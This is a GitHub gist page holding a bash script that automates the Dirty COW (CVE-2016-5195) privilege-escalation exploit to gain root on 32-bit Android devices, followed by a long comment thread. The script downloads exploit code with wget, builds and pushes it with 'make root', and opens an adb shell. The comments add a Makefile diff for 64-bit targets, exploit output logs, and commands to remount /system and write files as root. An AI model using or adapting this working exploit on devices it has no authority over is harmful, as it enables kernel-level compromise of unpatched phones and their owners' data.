Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
workspacezip="dirtyc0w_workspace.zip";
workspace="dirtyc0w_workspace";
rm -f $workspacezip > /dev/null; # Remove zip if it exists
rm -rf $workspace > /dev/null; # Remove workspace if it exists
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;
if [ -f $workspacezip ];
then
echo "[INFO] Extracting exploit files...";
unzip -a $workspacezip -d $workspace > /dev/null;
rm -f $workspacezip; # Remove zip if it exists
else
echo "[ERR] Failed to download exploit files.";
exit 1;
fi;
if [ -d $workspace ];
then
cd $workspace;
directory=$PWD; # thx @tomdeboer!
cd CVE-2016-5195-master;
else
echo "[ERR] Failed to extract exploit files.";
exit 1;
fi;
# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
make root;
clear;
# Hooray!
echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf $directory; # Clean up workspace
echo "Done";
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
adb shell;
clear;
exit 0;
@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

I put 'root' in quotes, because technically, it isn't rooting. However, it creates a binary called 'run-as' that can execute packages as root.

Owner

Arinerron commented Oct 27, 2016

I put 'root' in quotes, because technically, it isn't rooting. However, it creates a binary called 'run-as' that can execute packages as root.

@beardog108

This comment has been minimized.

Show comment
Hide comment
@beardog108

beardog108 Oct 27, 2016

Hey, Cool seeing you on front page of HN!

Hey, Cool seeing you on front page of HN!

@Arinerron

This comment has been minimized.

Show comment
Hide comment
Owner

Arinerron commented Oct 27, 2016

@beardog108 I am? :P

@ntcong

This comment has been minimized.

Show comment
Hide comment
@ntcong

ntcong Oct 27, 2016

Well if you can execute as root, I'm pretty sure that qualified as rooting in this case.

ntcong commented Oct 27, 2016

Well if you can execute as root, I'm pretty sure that qualified as rooting in this case.

@tomdeboer

This comment has been minimized.

Show comment
Hide comment
@tomdeboer

tomdeboer Oct 27, 2016

It'd be nice to have a little check after the download and unzip to see if it worked, otherwise your $PWD will be recursively removed

Edit: Done.

tomdeboer commented Oct 27, 2016

It'd be nice to have a little check after the download and unzip to see if it worked, otherwise your $PWD will be recursively removed

Edit: Done.

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

@tomdeboer Haha, that's true. Revised the code.

Owner

Arinerron commented Oct 27, 2016

@tomdeboer Haha, that's true. Revised the code.

@RenaKunisaki

This comment has been minimized.

Show comment
Hide comment
@RenaKunisaki

RenaKunisaki Oct 27, 2016

Why does it download and execute a script from the web (and not even verify a hash!) instead of bundling the necessary files? (At least it uses HTTPS...)

Why does it download and execute a script from the web (and not even verify a hash!) instead of bundling the necessary files? (At least it uses HTTPS...)

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

@RenaKunisaki Right, I'll do that when I have time. Thanks.

Owner

Arinerron commented Oct 27, 2016

@RenaKunisaki Right, I'll do that when I have time. Thanks.

@blizzard4591

This comment has been minimized.

Show comment
Hide comment
@blizzard4591

blizzard4591 Oct 27, 2016

It does not work on my Stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel3.4.0-8538464).

[] mmap 0xb6d7b000
[
] exploit (patch)
[] currently 0xb6d7b000=464c457f
[
] madvise = 0xb6d7b000 17920
[] madvise = 0 1048576
[
] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d7b000=464c457f
/home/myUser/Android/Sdk/platform-tools/adb shell /system/bin/run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000
Any ideas?

It does not work on my Stock Samsung Galaxy S5 (Android 6.0.1/Patchlevel September 1-2016/Kernel3.4.0-8538464).

[] mmap 0xb6d7b000
[
] exploit (patch)
[] currently 0xb6d7b000=464c457f
[
] madvise = 0xb6d7b000 17920
[] madvise = 0 1048576
[
] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d7b000=464c457f
/home/myUser/Android/Sdk/platform-tools/adb shell /system/bin/run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000
Any ideas?

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but in the makefile, you can change a setting in the makefile so it compiles for 64-bit architecture.

Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7

Owner

Arinerron commented Oct 27, 2016

@blizzard4591 Hey. You're not the only one with that problem actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but in the makefile, you can change a setting in the makefile so it compiles for 64-bit architecture.

Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7

@MF064DD

This comment has been minimized.

Show comment
Hide comment
@MF064DD

MF064DD Oct 27, 2016

[INFO] Downloading exploit files from GitHub...
[ERR] Failed to download exploit files.

Is there something I'm doing wrong here?

MF064DD commented Oct 27, 2016

[INFO] Downloading exploit files from GitHub...
[ERR] Failed to download exploit files.

Is there something I'm doing wrong here?

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

@MF064DD Is there an error when you run:

wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip;

?

Edit: Oh, nevermind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!

Owner

Arinerron commented Oct 27, 2016

@MF064DD Is there an error when you run:

wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip;

?

Edit: Oh, nevermind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!

@SpyKnife

This comment has been minimized.

Show comment
Hide comment
@SpyKnife

SpyKnife Oct 27, 2016

Still the same error: Failed to download exploit files

Still the same error: Failed to download exploit files

@MF064DD

This comment has been minimized.

Show comment
Hide comment
@MF064DD

MF064DD Oct 27, 2016

Still the same error: Failed to download exploit files

Exactly what he said. :p

Maybe I'm doing it wrong. I installed the necessary sdk modules and such.

Here's a visual.
https://streamable.com/h2qb

MF064DD commented Oct 27, 2016

Still the same error: Failed to download exploit files

Exactly what he said. :p

Maybe I'm doing it wrong. I installed the necessary sdk modules and such.

Here's a visual.
https://streamable.com/h2qb

@SpyKnife

This comment has been minimized.

Show comment
Hide comment
@SpyKnife

SpyKnife Oct 27, 2016

when i try just to execute the wget command i get this error:
Connecting to www.github.com (192.30.253.112:443) wget: can't execute 'ssl_helper': No such file or directory
wget: error getting response: Connection reset by peer

when i try just to execute the wget command i get this error:
Connecting to www.github.com (192.30.253.112:443) wget: can't execute 'ssl_helper': No such file or directory
wget: error getting response: Connection reset by peer

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 27, 2016

@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.

Owner

Arinerron commented Oct 27, 2016

@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.

@MF064DD

This comment has been minimized.

Show comment
Hide comment
@MF064DD

MF064DD Oct 27, 2016

No problem man! Hey, you gotta life. I can wait as long as you need us to. ^^

MF064DD commented Oct 27, 2016

No problem man! Hey, you gotta life. I can wait as long as you need us to. ^^

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 28, 2016

@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too).

I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though:

Root Android 32-bit / Guide

Prerequisites

  • Linux machine with
    • adb
    • android-ndk
    • gcc
  • 32-bit Android device plugged in to computer

Steps

  1. Download the exploit from here.
  2. Extract the zip file
  3. Enter the extracted zip's directory in Terminal
  4. Run the following command:
make root && adb shell;

And tada! The run-as binary has been installed on your android system.

Owner

Arinerron commented Oct 28, 2016

@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too).

I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though:

Root Android 32-bit / Guide

Prerequisites

  • Linux machine with
    • adb
    • android-ndk
    • gcc
  • 32-bit Android device plugged in to computer

Steps

  1. Download the exploit from here.
  2. Extract the zip file
  3. Enter the extracted zip's directory in Terminal
  4. Run the following command:
make root && adb shell;

And tada! The run-as binary has been installed on your android system.

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 28, 2016

@blizzard4591 Here's a quote from the issue:

The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.

[This is how I modified the file]

diff --git a/Makefile b/Makefile
index 19e09b8..1dd61c3 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,8 @@ build:
    ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21

 push: build
-       adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-       adb push libs/armeabi/run-as /data/local/tmp/run-as
+       adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
+       adb push libs/arm64-v8a/run-as /data/local/tmp/run-as

 root: push
    adb shell 'chmod 777 /data/local/tmp/run-as'

A good way to get device's abi could be

$ adb shell 'getprop ro.product.cpu.abilist'
arm64-v8a,armeabi-v7a,armeabi
Owner

Arinerron commented Oct 28, 2016

@blizzard4591 Here's a quote from the issue:

The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.

[This is how I modified the file]

diff --git a/Makefile b/Makefile
index 19e09b8..1dd61c3 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,8 @@ build:
    ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21

 push: build
-       adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-       adb push libs/armeabi/run-as /data/local/tmp/run-as
+       adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
+       adb push libs/arm64-v8a/run-as /data/local/tmp/run-as

 root: push
    adb shell 'chmod 777 /data/local/tmp/run-as'

A good way to get device's abi could be

$ adb shell 'getprop ro.product.cpu.abilist'
arm64-v8a,armeabi-v7a,armeabi
@RaPoZaUm

This comment has been minimized.

Show comment
Hide comment
@RaPoZaUm

RaPoZaUm Oct 28, 2016

Total noob here: is it usable on a Exynos S7Edge (G935F)? If so, would it trip knox to 0x1 (I assume it won't, but asking to be sure)

Total noob here: is it usable on a Exynos S7Edge (G935F)? If so, would it trip knox to 0x1 (I assume it won't, but asking to be sure)

@kirbyfan64

This comment has been minimized.

Show comment
Hide comment
@kirbyfan64

kirbyfan64 Oct 28, 2016

Man, those semicolons are driving me crazy. :O This is just an automation script for CVE repo, right?

Man, those semicolons are driving me crazy. :O This is just an automation script for CVE repo, right?

@MF064DD

This comment has been minimized.

Show comment
Hide comment
@MF064DD

MF064DD Oct 28, 2016

Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI

@Arinerron

MF064DD commented Oct 28, 2016

Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI

@Arinerron

@cmwedin

This comment has been minimized.

Show comment
Hide comment
@cmwedin

cmwedin Oct 28, 2016

i got run-as on, my phone, but if i try to do anything with it i get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader, could that have something to do with it?

cmwedin commented Oct 28, 2016

i got run-as on, my phone, but if i try to do anything with it i get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader, could that have something to do with it?

@PVineeth

This comment has been minimized.

Show comment
Hide comment
@PVineeth

PVineeth Oct 28, 2016

Is this only for 32-bit Android phones?

Is this only for 32-bit Android phones?

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Oct 28, 2016

Heh, here we go.

@RaPoZaUm Probably would work, but I haven't tested it.
@kirbyfan64 Yup
@MF064DD It should have installed a binary called run-as. You can open a terminal emulator on your phone and run stuff like run-as echo "pwned" > root_only_file.txt and write to it as root.
@cmwedin Sorry it isn't working. It might be that the binary is built for a 32-bit arch and your phone is 64. You can configure that. See my comment above. If it doesn't work, please report it here: https://github.com/timwr/CVE-2016-5195/issues Thanks!
@PVineeth The script is only built for 32-bit phones right now. You can exploit 64-bit phones though, too. See my comment above for more info.

Owner

Arinerron commented Oct 28, 2016

Heh, here we go.

@RaPoZaUm Probably would work, but I haven't tested it.
@kirbyfan64 Yup
@MF064DD It should have installed a binary called run-as. You can open a terminal emulator on your phone and run stuff like run-as echo "pwned" > root_only_file.txt and write to it as root.
@cmwedin Sorry it isn't working. It might be that the binary is built for a 32-bit arch and your phone is 64. You can configure that. See my comment above. If it doesn't work, please report it here: https://github.com/timwr/CVE-2016-5195/issues Thanks!
@PVineeth The script is only built for 32-bit phones right now. You can exploit 64-bit phones though, too. See my comment above for more info.

@mauricioprado00

This comment has been minimized.

Show comment
Hide comment
@mauricioprado00

mauricioprado00 Oct 30, 2016

Anyone has any idea what to use on the argument of run-as ?

1|shell@peregrine:/ $ run-as                                                   
Usage: run-as <package-name> <command> [<args>]

edit: I found what goes on package-name, this will give you a list of options

pm list packages -f

but... it doesn't work, example:

1|shell@peregrine:/ $ run-as com.google.android.apps.photos ls                 
run-as: Package 'com.google.android.apps.photos' is not debuggable

mauricioprado00 commented Oct 30, 2016

Anyone has any idea what to use on the argument of run-as ?

1|shell@peregrine:/ $ run-as                                                   
Usage: run-as <package-name> <command> [<args>]

edit: I found what goes on package-name, this will give you a list of options

pm list packages -f

but... it doesn't work, example:

1|shell@peregrine:/ $ run-as com.google.android.apps.photos ls                 
run-as: Package 'com.google.android.apps.photos' is not debuggable

@cmwedin

This comment has been minimized.

Show comment
Hide comment
@cmwedin

cmwedin Oct 30, 2016

@Arinerron my phone is 32 bit :/

cmwedin commented Oct 30, 2016

@Arinerron my phone is 32 bit :/

@MrMino

This comment has been minimized.

Show comment
Hide comment
@MrMino

MrMino Nov 10, 2016

It won't work anyway. The exploit in question can't run anything out of it's normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run sh with system() and execp(), I tried to chown() it to root:root, and SUID/GUID it with chmod(). Nothing works. I think that editing an existing binary with SUID toggled might work, but I didn't tried it - too much hassle for me, and generating a custom payload to do this is a bitch of a task, for someone who doesn't know the architecture.

MrMino commented Nov 10, 2016

It won't work anyway. The exploit in question can't run anything out of it's normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run sh with system() and execp(), I tried to chown() it to root:root, and SUID/GUID it with chmod(). Nothing works. I think that editing an existing binary with SUID toggled might work, but I didn't tried it - too much hassle for me, and generating a custom payload to do this is a bitch of a task, for someone who doesn't know the architecture.

@tinxx

This comment has been minimized.

Show comment
Hide comment
@tinxx

tinxx Nov 11, 2016

Have you taken into account that run-as is meant to give you different privileges and therefore would work within it's threshold (SE-wise)?
I think it still could work with the correct run-as binary, not yet tested myself, though.

tinxx commented Nov 11, 2016

Have you taken into account that run-as is meant to give you different privileges and therefore would work within it's threshold (SE-wise)?
I think it still could work with the correct run-as binary, not yet tested myself, though.

@garikay

This comment has been minimized.

Show comment
Hide comment
@garikay

garikay Dec 13, 2016

Arinerron please do (automation script) to 64 bit. I tried to modify the way you showed it but I could not get ...I have a backup TA partition for my Sony XA Ultra make via dirtyc0w escalation exploit. Now I need to exploit to root but I did not get, please help me

garikay commented Dec 13, 2016

Arinerron please do (automation script) to 64 bit. I tried to modify the way you showed it but I could not get ...I have a backup TA partition for my Sony XA Ultra make via dirtyc0w escalation exploit. Now I need to exploit to root but I did not get, please help me

@Pcmster

This comment has been minimized.

Show comment
Hide comment
@Pcmster

Pcmster Dec 31, 2016

Hello, sorry if I'm not an expert, but when I execut "run-as" it shows:
running as uid 2000
uid 0
When I type " ls /data/app " it says Permission denied, what I need to do?

Pcmster commented Dec 31, 2016

Hello, sorry if I'm not an expert, but when I execut "run-as" it shows:
running as uid 2000
uid 0
When I type " ls /data/app " it says Permission denied, what I need to do?

@Fohroer

This comment has been minimized.

Show comment
Hide comment
@Fohroer

Fohroer Jan 1, 2017

Will this work on Doogee X9 Pro or I will brick my device with this? Will this script install SuperSU or I must manually download it?

Fohroer commented Jan 1, 2017

Will this work on Doogee X9 Pro or I will brick my device with this? Will this script install SuperSU or I must manually download it?

@Arinerron

This comment has been minimized.

Show comment
Hide comment
@Arinerron

Arinerron Jan 7, 2017

@PVineeth @MrMino @tinxx @garikay @Pcmster @Buranek

If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)

@MF064DD Sorry for the late response. Type adb shell, then run-as. You now are root on your phone.

Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.

Owner

Arinerron commented Jan 7, 2017

@PVineeth @MrMino @tinxx @garikay @Pcmster @Buranek

If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)

@MF064DD Sorry for the late response. Type adb shell, then run-as. You now are root on your phone.

Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.

@Rasmis

This comment has been minimized.

Show comment
Hide comment
@Rasmis

Rasmis Jan 10, 2017

I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do run-as in adb shell I get this:

1|shell@bno_MT5593Uplus_EU:/ $ run-as
Usage: run-as <package-name> <command> [<args>]

If I try to run any package with run-as, it says run-as: Package '[ ]' is not debuggable. I've tried own packages, already installed packages, official and unofficial packages.

Any thoughts @Arinerron ?

Rasmis commented Jan 10, 2017

I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do run-as in adb shell I get this:

1|shell@bno_MT5593Uplus_EU:/ $ run-as
Usage: run-as <package-name> <command> [<args>]

If I try to run any package with run-as, it says run-as: Package '[ ]' is not debuggable. I've tried own packages, already installed packages, official and unofficial packages.

Any thoughts @Arinerron ?

@m4hmoud

This comment has been minimized.

Show comment
Hide comment
@m4hmoud

m4hmoud Jan 19, 2017

I tried using this on LG G3 (with armeabi-v7a version), but I get this error:

could not open /system/bin/run-as

And run-as command gives me this:

run-as: can't execute: Permission denied

Anybody has any suggestions?

m4hmoud commented Jan 19, 2017

I tried using this on LG G3 (with armeabi-v7a version), but I get this error:

could not open /system/bin/run-as

And run-as command gives me this:

run-as: can't execute: Permission denied

Anybody has any suggestions?

@Melab

This comment has been minimized.

Show comment
Hide comment
@Melab

Melab Jan 29, 2017

@Arinerron Is there anyway to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace /system/bin/run-as, then surely you can use it to do things that you'd use the new /system/bin/run-as to do, right?

Melab commented Jan 29, 2017

@Arinerron Is there anyway to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace /system/bin/run-as, then surely you can use it to do things that you'd use the new /system/bin/run-as to do, right?

@Deepak157

This comment has been minimized.

Show comment
Hide comment

nice

@droidvoider

This comment has been minimized.

Show comment
Hide comment
@droidvoider

droidvoider Mar 1, 2017

@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard.

@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard.

@thaomvs

This comment has been minimized.

Show comment
Hide comment
@thaomvs

thaomvs Mar 9, 2017

Hi @Arinerron,
I installed the run-as successfully. However, it still does not allow to write the file.

shell@P1a42:/ # echo "pwned" > root_only_file.txt
/system/bin/sh: can't create root_only_file.txt: Read-only file system

Is there any extra steps to take it work?

thaomvs commented Mar 9, 2017

Hi @Arinerron,
I installed the run-as successfully. However, it still does not allow to write the file.

shell@P1a42:/ # echo "pwned" > root_only_file.txt
/system/bin/sh: can't create root_only_file.txt: Read-only file system

Is there any extra steps to take it work?

@ARM-MK

This comment has been minimized.

Show comment
Hide comment
@20esaua

This comment has been minimized.

Show comment
Hide comment
@20esaua

20esaua Apr 12, 2017

@thaomvs Sorry about the late reply-- Simply executing run-as switches to the root user.

20esaua commented Apr 12, 2017

@thaomvs Sorry about the late reply-- Simply executing run-as switches to the root user.

@sevenup30

This comment has been minimized.

Show comment
Hide comment
@sevenup30

sevenup30 May 12, 2017

Once i gain root acces i can't remount system for installing su binnary,
`# adb shell

athene_f:/ $ run-as

uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r🐚s0

athene_f:/ # whoami

root

athene_f:/ # mount -o rw,remount /system
'/dev/block/bootdevice/by-name/system' is read-only
mount: '/dev/block/bootdevice/by-name/system'->'/system': Permission denied
1|athene_f:/ #
`
Any idea why?
I followed your guide
Root Android 32-bit / Guide
Prerequisites

Linux machine with
    adb
    android-ndk
    gcc
32-bit Android device plugged in to computer

Steps

Download the exploit from here.
Extract the zip file
Enter the extracted zip's directory in Terminal
Run the following command:

make root && adb shell;

and my phone is a 32bits

Thanks

sevenup30 commented May 12, 2017

Once i gain root acces i can't remount system for installing su binnary,
`# adb shell

athene_f:/ $ run-as

uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r🐚s0

athene_f:/ # whoami

root

athene_f:/ # mount -o rw,remount /system
'/dev/block/bootdevice/by-name/system' is read-only
mount: '/dev/block/bootdevice/by-name/system'->'/system': Permission denied
1|athene_f:/ #
`
Any idea why?
I followed your guide
Root Android 32-bit / Guide
Prerequisites

Linux machine with
    adb
    android-ndk
    gcc
32-bit Android device plugged in to computer

Steps

Download the exploit from here.
Extract the zip file
Enter the extracted zip's directory in Terminal
Run the following command:

make root && adb shell;

and my phone is a 32bits

Thanks

@sick13

This comment has been minimized.

Show comment
Hide comment
@sick13

sick13 May 28, 2017

@Arinerron i have read thru the comments and i have a question.
installing "run-as" on android trough this script will allow me to say start FX File manager with root permissions and then i can delete/remove system apps? correct?

sick13 commented May 28, 2017

@Arinerron i have read thru the comments and i have a question.
installing "run-as" on android trough this script will allow me to say start FX File manager with root permissions and then i can delete/remove system apps? correct?

@20esaua

This comment has been minimized.

Show comment
Hide comment
@20esaua

20esaua Jun 6, 2017

@sevenup30 Try remounting /system using this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system
@sick13 Yes, correct. That should work.

20esaua commented Jun 6, 2017

@sevenup30 Try remounting /system using this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system
@sick13 Yes, correct. That should work.

@20esaua

This comment has been minimized.

Show comment
Hide comment
@20esaua

20esaua Jun 6, 2017

@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system already patched?

20esaua commented Jun 6, 2017

@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system already patched?

@cyrexcyborg

This comment has been minimized.

Show comment
Hide comment
@cyrexcyborg

cyrexcyborg Aug 31, 2017

hi, I've done all the steps, but don't get any info instead of exploited.

  • [*] size 14192
  • [*] mmap 0x7f7f3c5000
  • [*] currently 0x7f7f3c5000=10102464c457f
  • [*] using /proc/self/mem method
  • [*] madvise = 0x7f7f3c5000 14192
  • [*] madvise = 0 16777216
  • [*] /proc/self/mem 142459296 10038
  • [*] exploited 0 0x7f7f3c5000=10102464c457f
    no any info here

cyrexcyborg commented Aug 31, 2017

hi, I've done all the steps, but don't get any info instead of exploited.

  • [*] size 14192
  • [*] mmap 0x7f7f3c5000
  • [*] currently 0x7f7f3c5000=10102464c457f
  • [*] using /proc/self/mem method
  • [*] madvise = 0x7f7f3c5000 14192
  • [*] madvise = 0 16777216
  • [*] /proc/self/mem 142459296 10038
  • [*] exploited 0 0x7f7f3c5000=10102464c457f
    no any info here
@walkman4321

This comment has been minimized.

Show comment
Hide comment
@walkman4321

walkman4321 Mar 14, 2018

@20esaua After run this command : mount -o rw,remount /dev/block/bootdevice/by-name/system /system
Terminal prompt hangs. It does not give any output or error

@20esaua After run this command : mount -o rw,remount /dev/block/bootdevice/by-name/system /system
Terminal prompt hangs. It does not give any output or error

@walkman4321

This comment has been minimized.

Show comment
Hide comment
@walkman4321

walkman4321 Mar 14, 2018

Is there something we have to write in place of "by-name"

Is there something we have to write in place of "by-name"

@FairyTail2000

This comment has been minimized.

Show comment
Hide comment
@FairyTail2000

FairyTail2000 Apr 8, 2018

So this Script installs a Custom Version of run-as? Do i lose my guarantee if i use this Script?

So this Script installs a Custom Version of run-as? Do i lose my guarantee if i use this Script?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment